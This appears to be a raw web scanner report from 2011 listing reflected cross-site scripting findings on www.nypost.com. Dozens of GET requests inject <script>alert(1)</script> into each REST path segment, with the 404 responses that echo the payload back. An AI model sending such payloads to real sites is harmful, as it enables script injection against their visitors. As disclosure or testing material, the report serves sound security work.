GET /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.jse3c41<script>alert(1)</script>99ae3cfd7e7 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:38 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96919<script>alert(1)</script>9ef71511f62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig96919<script>alert(1)</script>9ef71511f62/WebPortal/nypost/blocks/top_story/top_story_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:20 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a3423<script>alert(1)</script>566e4fbef2a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortala3423<script>alert(1)</script>566e4fbef2a/nypost/blocks/top_story/top_story_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:22 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload daa52<script>alert(1)</script>4f66ae14dab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostdaa52<script>alert(1)</script>4f66ae14dab/blocks/top_story/top_story_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:24 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8827e<script>alert(1)</script>bdb9e0cf9a4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks8827e<script>alert(1)</script>bdb9e0cf9a4/top_story/top_story_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:26 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b1929<script>alert(1)</script>2de6f914a76 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/top_storyb1929<script>alert(1)</script>2de6f914a76/top_story_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:30 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 67ba7<script>alert(1)</script>f79943d7d67 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js67ba7<script>alert(1)</script>f79943d7d67 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:32 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6aa9<script>alert(1)</script>077023dc889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfiga6aa9<script>alert(1)</script>077023dc889/WebPortal/nypost/css/pkgs/_general.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:44 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 84b9e<script>alert(1)</script>7574eff7a56 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal84b9e<script>alert(1)</script>7574eff7a56/nypost/css/pkgs/_general.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:49 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 904d0<script>alert(1)</script>e4582393244 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost904d0<script>alert(1)</script>e4582393244/css/pkgs/_general.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:53 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8749c<script>alert(1)</script>a6dd37c3af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/css8749c<script>alert(1)</script>a6dd37c3af/pkgs/_general.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 706 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:58 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e33ef<script>alert(1)</script>d49557b0939 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/css/pkgse33ef<script>alert(1)</script>d49557b0939/_general.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:01 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 18d57<script>alert(1)</script>6aa631dca77 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/css/pkgs/_general.css18d57<script>alert(1)</script>6aa631dca77 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:03 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f598<script>alert(1)</script>4ed4143b92a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig7f598<script>alert(1)</script>4ed4143b92a/WebPortal/nypost/css/pkgs/_homepage.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:47 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38ba5<script>alert(1)</script>7008224dc1b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal38ba5<script>alert(1)</script>7008224dc1b/nypost/css/pkgs/_homepage.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:53 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cdad<script>alert(1)</script>92d48438688 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost6cdad<script>alert(1)</script>92d48438688/css/pkgs/_homepage.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:57 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73a2a<script>alert(1)</script>df3ef1f917c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/css73a2a<script>alert(1)</script>df3ef1f917c/pkgs/_homepage.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:01 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cc5d2<script>alert(1)</script>449ea97bbc4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/css/pkgscc5d2<script>alert(1)</script>449ea97bbc4/_homepage.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:03 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ee93b<script>alert(1)</script>56414281bab was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.cssee93b<script>alert(1)</script>56414281bab HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:05 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c3a1c<script>alert(1)</script>a1d53ebc51a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigc3a1c<script>alert(1)</script>a1d53ebc51a/WebPortal/nypost/images/favicon.ico HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 704 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:22 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ad7d<script>alert(1)</script>c57b650bad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal4ad7d<script>alert(1)</script>c57b650bad6/nypost/images/favicon.ico HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 704 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:26 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload afe55<script>alert(1)</script>5f67294b752 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostafe55<script>alert(1)</script>5f67294b752/images/favicon.ico HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 704 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:27 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 22ee2<script>alert(1)</script>a3b54475bce was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/images22ee2<script>alert(1)</script>a3b54475bce/favicon.ico HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 704 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:31 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a2141<script>alert(1)</script>7aebd84e00c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/images/favicon.icoa2141<script>alert(1)</script>7aebd84e00c HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 704 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:34 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d6317<script>alert(1)</script>643940e8898 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigd6317<script>alert(1)</script>643940e8898/WebPortal/nypost/scripts/block_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:43 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb7ee<script>alert(1)</script>2bfeb5a0491 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortaleb7ee<script>alert(1)</script>2bfeb5a0491/nypost/scripts/block_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:45 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 499b3<script>alert(1)</script>7343fa861ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost499b3<script>alert(1)</script>7343fa861ea/scripts/block_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:46 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cfd1e<script>alert(1)</script>bcbdbe420c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scriptscfd1e<script>alert(1)</script>bcbdbe420c9/block_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:48 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cee0a<script>alert(1)</script>de5fe07510f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/block_functions.jscee0a<script>alert(1)</script>de5fe07510f HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:50 GMT Connection: close
